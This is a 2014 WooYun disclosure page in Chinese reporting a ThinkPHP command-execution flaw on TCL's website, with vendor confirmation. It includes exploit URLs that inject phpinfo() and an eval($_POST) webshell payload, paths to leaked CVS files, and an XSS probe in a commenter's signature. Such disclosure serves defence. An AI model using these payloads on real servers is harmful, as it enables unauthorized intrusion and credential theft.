漏洞概要
关注数(24)
关注此漏洞
漏洞标题:TCL官网命令执行导致getshell(可内网,附赠信息泄漏一枚)
提交时间:2014-04-30 19:45
修复时间:2014-06-14 19:45
公开时间:2014-06-14 19:45
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-04-30: 厂商已经确认,细节仅向厂商公开
2014-05-10: 细节向核心白帽子及相关领域专家公开
2014-05-20: 细节向普通白帽子公开
2014-05-30: 细节向实习白帽子公开
2014-06-14: 细节向公众公开
简要描述:
如题
详细说明:
1. 主站命令执行
是thinkphp的命令执行漏洞,这么久了还没修复,维护人员该打pp了
http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}
直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell
来张图
内网信息
漏洞证明:
内网敏感信息泄漏
翻下目录,发现了内网好多信息
1. n多数据库账户密码泄漏
2. 附赠子域名站点cvs信息泄漏一枚
http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root
修复方案:
1. 升级
2. 改口令,之前不知道还有人来过没,一定要改
3. 给个高rank呗
版权声明:转载请注明来源 Mody@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-04-30 22:03
厂商回复:
感谢您的关注,已转交相关单位处理。
最新状态:
暂无
漏洞评价:
评论
-
2014-04-30 22:49 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
-
2014-05-21 18:16 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-05-21 19:14 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
-
2014-05-21 19:15 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
-
2014-05-21 19:18 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-05-21 22:00 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
@U神 https://www.yascanner.com/#!/
-
2014-05-21 22:01 |
Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
@U神 https://www.yascanner.com/#!/
-
2014-05-22 12:21 |
pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )